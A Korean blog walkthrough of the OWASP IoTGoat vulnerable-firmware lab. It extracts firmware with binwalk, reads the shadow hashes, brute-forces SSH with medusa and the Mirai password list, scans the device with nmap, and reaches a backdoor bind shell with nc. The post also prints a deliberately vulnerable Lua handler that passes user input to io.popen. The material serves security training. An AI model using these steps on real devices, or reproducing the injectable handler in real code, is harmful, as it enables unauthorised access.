티스토리 뷰
실습환경: kali-linux-2020.4-vmware-amd64, IoTGoat-x86
github.com/OWASP/IoTGoat/releases
[IoTGoat-x86 환경구축]
1. IoTGoat-x86.vmdk 다운로드
다운로드: github.com/OWASP/IoTGoat/releases
2. vmware에 IoTGoat-x86 구성
- Create a New Virtual Machine > Typical > I will install the operating system later
- Type: Linux , Version: Linux 2.6 / 3.x / 4.x (32-bit)
- 설치 경로 지정 후 disk size 10~15GB로 지정
- 설치 경로에 있는 .vmdk 파일을 다운로드 받은 .vmdk 파일로 바꿔준 후 실행 (램은 4GB로 추천)
[IoTGoat 분석하기]
1. 펌웨어 내 하드코딩 되어있는 사용자 인증정보 획득
1) binwalk를 이용하여 IoTGoat 파일 시스템 추출
$ binwalk -eM IoTGoat-raspberry-pi2.img
Scan Time: 2021-01-14 00:54:42
Target File: /home/kali/Desktop/IoTGoat-raspberry-pi2.img
MD5 Checksum: 9fb28986b3a610fe60f3927bc7dd643b
Signatures: 391
DECIMAL HEXADECIMAL DESCRIPTION
-------------------------------------------------------------------------------
4253711 0x40E80F Copyright string: "copyright does *not* cover user programs that use kernel"
4253946 0x40E8FA Copyright string: "copyrighted by the Free Software"
4254058 0x40E96A Copyright string: "copyrighted by me and others who actually wrote it."
4254443 0x40EAEB Copyright string: "Copyright (C) 1989, 1991 Free Software Foundation, Inc."
4256293 0x40F225 Copyright string: "copyright the software, and"
...
...
29360128 0x1C00000 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 3946402 bytes, 1333 inodes, blocksize: 262144 bytes, created: 2019-01-30 12:21:02
2) 생성된 폴더 내 passwd 파일 확인
- root와 iotgoatuser 의 로그인 쉘 /bin/ash 확인
$ cat _IoTGoat-raspberry-pi2.img.extracted/squashfs-root/etc/passwd*
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
iotgoatuser:x:1000:1000::/root:/bin/ash
3) shadow 파일 확인
- 암호 알고리즘 ($1=md5)과 패스워드 확인
$ cat _IoTGoat-raspberry-pi2.img.extracted/squashfs-root/etc/shadow*
root:$1$Jl7H1VOG$Wgw2F/C.nLNTC.4pwDa4H1:18145:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
dnsmasq:x:0:0:99999:7:::
dnsmasq:x:0:0:99999:7:::
iotgoatuser:$1$79bz0K8z$Ii6Q/if83F1QodGmkb4Ah.:18145:0:99999:7:::
root:$1$KzoHhzG9$wGyFXbWOcRChy3e.Ep2NY1:18080:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
dnsmasq:x:0:0:99999:7:::
4) bruteforce tool을 이용하여 패스워드 크랙
- seclists 설치 (민감 정보 패턴, 퍼징 페이로드, 웹쉘 등을 제공함)
- 미라이 봇넷에서 사용한 패스워드 리스트를 이용
$ git clone https://github.com/danielmiessler/SecLists.git 1 ⨯
Cloning into 'SecLists'...
remote: Enumerating objects: 9535, done.
remote: Total 9535 (delta 0), reused 0 (delta 0), pack-reused 9535
Receiving objects: 100% (9535/9535), 779.68 MiB | 10.81 MiB/s, done.
Resolving deltas: 100% (4948/4948), done.
Updating files: 100% (5336/5336), done.
- 제공되는 mirai-botnet.txt 파일 내에 (사용자,패스워드) 쌍으로 저장되어 있으므로 패스워드만 남겨 파일을 재생성 함
$ ls
conficker.txt mirai-botnet.txt
$ awk '{print $2}' mirai-botnet.txt > mirai-botnet_passwords.txt
- medusa를 이용하여 패스워드 크랙 시도
- 대상: 실행중인 IoTGoat-x86의 ip
$ medusa -u iotgoatuser -P mirai-botnet_passwords.txt -h 192.168.64.133 -M ssh
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: xc3511 (1 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: vizxv (2 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: admin (3 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: admin (4 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 888888 (5 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: xmhdipc (6 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: default (7 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: jauntech (8 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 123456 (9 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 54321 (10 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: support (11 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: (none) (12 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: password (13 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: root (14 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 12345 (15 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: user (16 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: (none) (17 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: pass (18 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: admin1234 (19 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 1111 (20 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: smcadmin (21 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 1111 (22 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 666666 (23 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: password (24 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 1234 (25 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: klv123 (26 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: admin (27 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: service (28 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: supervisor (29 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: guest (30 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 12345 (31 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: password (32 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 1234 (33 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 666666 (34 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 888888 (35 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: ubnt (36 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: klv1234 (37 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: Zte521 (38 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: hi3518 (39 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: jvbzd (40 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: anko (41 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: zlxx. (42 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.64.133 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 7ujMko0vizxv (43 of 60 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.64.133 User: iotgoatuser Password: 7ujMko0vizxv [SUCCESS]
- ssh 접속하여 획득한 패스워드로 로그인 (iotgoatuser/7ujMko0vizxv)
2. nmap 스캔을 통한 서비스 정보 획득
1) 전체 포트 스캔하여 오픈된 서비스 확인
$ nmap -p- -sT 192.168.64.133 // -p-: 모든 포트 스캔, -sT: TCP Open Scan
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-14 02:25 EST
Nmap scan report for 192.168.64.133
Host is up (0.00098s latency).
Not shown: 65390 closed ports, 138 filtered ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
443/tcp open https
5000/tcp open upnp
5515/tcp open unknown
65534/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 2801.44 seconds
2) upnp 서비스 버전정보스캔
- MiniUPnP 2.1
$ nmap -p5000 -sV 192.168.64.133
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-15 00:57 EST
WARNING: Service 192.168.64.133:5000 had already soft-matched upnp, but now soft-matched rtsp; ignoring second value
WARNING: Service 192.168.64.133:5000 had already soft-matched upnp, but now soft-matched sip; ignoring second value
Nmap scan report for 192.168.64.133
Host is up (0.00039s latency).
PORT STATE SERVICE VERSION
5000/tcp open upnp MiniUPnP 2.1 (UPnP 1.1)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5000-TCP:V=7.91%I=7%D=1/15%Time=60012ECE%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,124,"\x20501\x20Not\x20Implemented\r\nContent-Type:\x20text/
SF:html\r\nConnection:\x20close\r\nContent-Length:\x20149\r\nServer:\x20Op
SF:enWRT/18\.06\.2\x20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HE
SF:AD><TITLE>501\x20Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x20Impl
SF:emented</H1>The\x20HTTP\x20Method\x20is\x20not\x20implemented\x20by\x20
SF:this\x20server\.</BODY></HTML>\r\n")%r(GetRequest,117,"HTTP/1\.0\x20404
SF:\x20Not\x20Found\r\nContent-Type:\x20text/html\r\nConnection:\x20close\
SF:r\nContent-Length:\x20134\r\nServer:\x20OpenWRT/18\.06\.2\x20UPnP/1\.1\
SF:x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HEAD><TITLE>404\x20Not\x20Found
SF:</TITLE></HEAD><BODY><H1>Not\x20Found</H1>The\x20requested\x20URL\x20wa
SF:s\x20not\x20found\x20on\x20this\x20server\.</BODY></HTML>\r\n")%r(RTSPR
SF:equest,12C,"RTSP/1\.0\x20501\x20Not\x20Implemented\r\nContent-Type:\x20
SF:text/html\r\nConnection:\x20close\r\nContent-Length:\x20149\r\nServer:\
SF:x20OpenWRT/18\.06\.2\x20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTM
SF:L><HEAD><TITLE>501\x20Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x2
SF:0Implemented</H1>The\x20HTTP\x20Method\x20is\x20not\x20implemented\x20b
SF:y\x20this\x20server\.</BODY></HTML>\r\n")%r(HTTPOptions,12C,"HTTP/1\.0\
SF:x20501\x20Not\x20Implemented\r\nContent-Type:\x20text/html\r\nConnectio
SF:n:\x20close\r\nContent-Length:\x20149\r\nServer:\x20OpenWRT/18\.06\.2\x
SF:20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HEAD><TITLE>501\x20
SF:Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x20Implemented</H1>The\x
SF:20HTTP\x20Method\x20is\x20not\x20implemented\x20by\x20this\x20server\.<
SF:/BODY></HTML>\r\n")%r(FourOhFourRequest,117,"HTTP/1\.0\x20404\x20Not\x2
SF:0Found\r\nContent-Type:\x20text/html\r\nConnection:\x20close\r\nContent
SF:-Length:\x20134\r\nServer:\x20OpenWRT/18\.06\.2\x20UPnP/1\.1\x20MiniUPn
SF:Pd/2\.1\r\nExt:\r\n\r\n<HTML><HEAD><TITLE>404\x20Not\x20Found</TITLE></
SF:HEAD><BODY><H1>Not\x20Found</H1>The\x20requested\x20URL\x20was\x20not\x
SF:20found\x20on\x20this\x20server\.</BODY></HTML>\r\n")%r(SIPOptions,12B,
SF:"SIP/2\.0\x20501\x20Not\x20Implemented\r\nContent-Type:\x20text/html\r\
SF:nConnection:\x20close\r\nContent-Length:\x20149\r\nServer:\x20OpenWRT/1
SF:8\.06\.2\x20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HEAD><TIT
SF:LE>501\x20Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x20Implemented
SF:</H1>The\x20HTTP\x20Method\x20is\x20not\x20implemented\x20by\x20this\x2
SF:0server\.</BODY></HTML>\r\n");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.56 seconds
3) nmap에서 제공하는 broadcast-upnp-info 스크립트를 이용하여 세부정보 스캔
- Webserver: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
참고: nmap.org/nsedoc/scripts/broadcast-upnp-info.html
$ nmap -sV --script=broadcast-upnp-info 192.168.64.133
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-15 01:02 EST
Pre-scan script results:
| broadcast-upnp-info:
| 239.255.255.250
| Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
| Location: http://192.168.64.133:5000/rootDesc.xml
| Webserver: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
| Name: OpenWRT router
| Manufacturer: OpenWRT
| Model Descr: OpenWRT router
| Model Name: OpenWRT router
| Model Version: 1
| Name: WANDevice
| Manufacturer: MiniUPnP
| Model Descr: WAN Device
| Model Name: WAN Device
| Model Version: 20190130
| Name: WANConnectionDevice
| Manufacturer: MiniUPnP
| Model Descr: MiniUPnP daemon
| Model Name: MiniUPnPd
|_ Model Version: 20190130
WARNING: Service 192.168.64.133:5000 had already soft-matched upnp, but now soft-matched rtsp; ignoring second value
WARNING: Service 192.168.64.133:5000 had already soft-matched upnp, but now soft-matched sip; ignoring second value
Nmap scan report for 192.168.64.133
Host is up (0.00042s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh Dropbear sshd (protocol 2.0)
53/tcp open domain dnsmasq 2.73
80/tcp open http LuCI Lua http config
443/tcp open ssl/http LuCI Lua http config
5000/tcp open upnp MiniUPnP 2.1 (UPnP 1.1)
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.0 404 Not Found
| Content-Type: text/html
| Connection: close
| Content-Length: 134
| Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
| Ext:
| <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL was not found on this server.</BODY></HTML>
| GenericLines:
| 501 Not Implemented
| Content-Type: text/html
| Connection: close
| Content-Length: 149
| Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
| Ext:
| <HTML><HEAD><TITLE>501 Not Implemented</TITLE></HEAD><BODY><H1>Not Implemented</H1>The HTTP Method is not implemented by this server.</BODY></HTML>
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Content-Type: text/html
| Connection: close
| Content-Length: 149
| Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
| Ext:
| <HTML><HEAD><TITLE>501 Not Implemented</TITLE></HEAD><BODY><H1>Not Implemented</H1>The HTTP Method is not implemented by this server.</BODY></HTML>
| RTSPRequest:
| RTSP/1.0 501 Not Implemented
| Content-Type: text/html
| Connection: close
| Content-Length: 149
| Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
| Ext:
| <HTML><HEAD><TITLE>501 Not Implemented</TITLE></HEAD><BODY><H1>Not Implemented</H1>The HTTP Method is not implemented by this server.</BODY></HTML>
| SIPOptions:
| SIP/2.0 501 Not Implemented
| Content-Type: text/html
| Connection: close
| Content-Length: 149
| Server: OpenWRT/18.06.2 UPnP/1.1 MiniUPnPd/2.1
| Ext:
|_ <HTML><HEAD><TITLE>501 Not Implemented</TITLE></HEAD><BODY><H1>Not Implemented</H1>The HTTP Method is not implemented by this server.</BODY></HTML>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5000-TCP:V=7.91%I=7%D=1/15%Time=60013014%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,124,"\x20501\x20Not\x20Implemented\r\nContent-Type:\x20text/
SF:html\r\nConnection:\x20close\r\nContent-Length:\x20149\r\nServer:\x20Op
SF:enWRT/18\.06\.2\x20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HE
SF:AD><TITLE>501\x20Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x20Impl
SF:emented</H1>The\x20HTTP\x20Method\x20is\x20not\x20implemented\x20by\x20
SF:this\x20server\.</BODY></HTML>\r\n")%r(GetRequest,117,"HTTP/1\.0\x20404
SF:\x20Not\x20Found\r\nContent-Type:\x20text/html\r\nConnection:\x20close\
SF:r\nContent-Length:\x20134\r\nServer:\x20OpenWRT/18\.06\.2\x20UPnP/1\.1\
SF:x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HEAD><TITLE>404\x20Not\x20Found
SF:</TITLE></HEAD><BODY><H1>Not\x20Found</H1>The\x20requested\x20URL\x20wa
SF:s\x20not\x20found\x20on\x20this\x20server\.</BODY></HTML>\r\n")%r(RTSPR
SF:equest,12C,"RTSP/1\.0\x20501\x20Not\x20Implemented\r\nContent-Type:\x20
SF:text/html\r\nConnection:\x20close\r\nContent-Length:\x20149\r\nServer:\
SF:x20OpenWRT/18\.06\.2\x20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTM
SF:L><HEAD><TITLE>501\x20Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x2
SF:0Implemented</H1>The\x20HTTP\x20Method\x20is\x20not\x20implemented\x20b
SF:y\x20this\x20server\.</BODY></HTML>\r\n")%r(HTTPOptions,12C,"HTTP/1\.0\
SF:x20501\x20Not\x20Implemented\r\nContent-Type:\x20text/html\r\nConnectio
SF:n:\x20close\r\nContent-Length:\x20149\r\nServer:\x20OpenWRT/18\.06\.2\x
SF:20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HEAD><TITLE>501\x20
SF:Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x20Implemented</H1>The\x
SF:20HTTP\x20Method\x20is\x20not\x20implemented\x20by\x20this\x20server\.<
SF:/BODY></HTML>\r\n")%r(FourOhFourRequest,117,"HTTP/1\.0\x20404\x20Not\x2
SF:0Found\r\nContent-Type:\x20text/html\r\nConnection:\x20close\r\nContent
SF:-Length:\x20134\r\nServer:\x20OpenWRT/18\.06\.2\x20UPnP/1\.1\x20MiniUPn
SF:Pd/2\.1\r\nExt:\r\n\r\n<HTML><HEAD><TITLE>404\x20Not\x20Found</TITLE></
SF:HEAD><BODY><H1>Not\x20Found</H1>The\x20requested\x20URL\x20was\x20not\x
SF:20found\x20on\x20this\x20server\.</BODY></HTML>\r\n")%r(SIPOptions,12B,
SF:"SIP/2\.0\x20501\x20Not\x20Implemented\r\nContent-Type:\x20text/html\r\
SF:nConnection:\x20close\r\nContent-Length:\x20149\r\nServer:\x20OpenWRT/1
SF:8\.06\.2\x20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n<HTML><HEAD><TIT
SF:LE>501\x20Not\x20Implemented</TITLE></HEAD><BODY><H1>Not\x20Implemented
SF:</H1>The\x20HTTP\x20Method\x20is\x20not\x20implemented\x20by\x20this\x2
SF:0server\.</BODY></HTML>\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.40 seconds
3. 숨겨진 페이지 찾기
1) binwalk를 이용하여 IoTGoat 파일 시스템 추출
$ binwalk -eM IoTGoat-raspberry-pi2.img
Scan Time: 2021-01-14 00:54:42
Target File: /home/kali/Desktop/IoTGoat-raspberry-pi2.img
MD5 Checksum: 9fb28986b3a610fe60f3927bc7dd643b
Signatures: 391
DECIMAL HEXADECIMAL DESCRIPTION
-------------------------------------------------------------------------------
4253711 0x40E80F Copyright string: "copyright does *not* cover user programs that use kernel"
4253946 0x40E8FA Copyright string: "copyrighted by the Free Software"
4254058 0x40E96A Copyright string: "copyrighted by me and others who actually wrote it."
4254443 0x40EAEB Copyright string: "Copyright (C) 1989, 1991 Free Software Foundation, Inc."
4256293 0x40F225 Copyright string: "copyright the software, and"
...
...
29360128 0x1C00000 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 3946402 bytes, 1333 inodes, blocksize: 262144 bytes, created: 2019-01-30 12:21:02
2) 추출 후 생성된 폴더에서 controller 디렉토리 내 iotgoat.lua 파일 확인
- admin/iotgoat/cmdinject, admin/iotgoat/cam, admin/iotgoat/door, admin/iotgoat/webcmd 설정 확인
- 접근 시 숨겨진 페이지를 확인할 수 있음
~/Desktop/_IoTGoat-raspberry-pi2.img.extracted/squashfs-root/usr/lib/lua/luci/controller
$ ls
admin firewall.lua iotgoat upnp.lua
$ cd iotgoat
$ ls
iotgoat.lua sensordata.
$ vim lotgoat.lua
module("luci.controller.iotgoat.iotgoat", package.seeall)
local http = require("luci.http")
function index()
entry({"admin", "iotgoat"}, firstchild(), "IoTGoat", 60).dependent=false
entry({"admin", "iotgoat", "cmdinject"}, template("iotgoat/cmd"), "", 1)
entry({"admin", "iotgoat", "cam"}, template("iotgoat/camera"), "Camera", 2)
entry({"admin", "iotgoat", "door"}, template("iotgoat/door"), "Doorlock", 3)
entry({"admin", "iotgoat", "webcmd"}, call("webcmd"))
end
function webcmd()
local cmd = http.formvalue("cmd")
if cmd then
local fp = io.popen(tostring(cmd).." 2>&1")
local result = fp:read("*a")
fp:close()
result = result:gsub("<", "<")
http.write(tostring(result))
else
http.write_json(http.formvalue())
end
end
3) webshell을 이용하여 쉘 획득 시도
- '2-1에서 nmap을 통해 포트가 열려있는 서비스를 확인하였음
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
443/tcp open https
5000/tcp open upnp
5515/tcp open unknown
65534/tcp open unknown
- 서비스가 unknown으로 확인되는 5515 포트를 이용하여 바인드쉘 획득
$ nc -nv 192.168.64.133 5515 1 ⨯
(UNKNOWN) [192.168.64.133] 5515 (?) open
[***]Successfully Connected to IoTGoat's Backdoor[***]
ls
bin
boot
dev
dnsmasq_setup.sh
etc
lib
mnt
overlay
proc
rom
root
sbin
sys
tmp
usr
var
www
'Study > ETC' 카테고리의 다른 글
| [Fuzzing] KMplayer 크래시 분석(2) - Windbg로 크래시 분석하기 (0) | 2021.11.16 |
|---|---|
| [Fuzzing] KMplayer 크래시 분석(1) - BFF 설치 및 실행 (0) | 2021.11.16 |
| nmap 명령어 (0) | 2021.11.02 |
| python 여러 버전 사용하기 - python 가상환경 구축 (칼리리눅스) (0) | 2021.11.01 |
| nmap thread 스크립트 (0) | 2020.03.31 |
댓글
최근에 올라온 글
최근에 달린 댓글
- Total
- Today
- Yesterday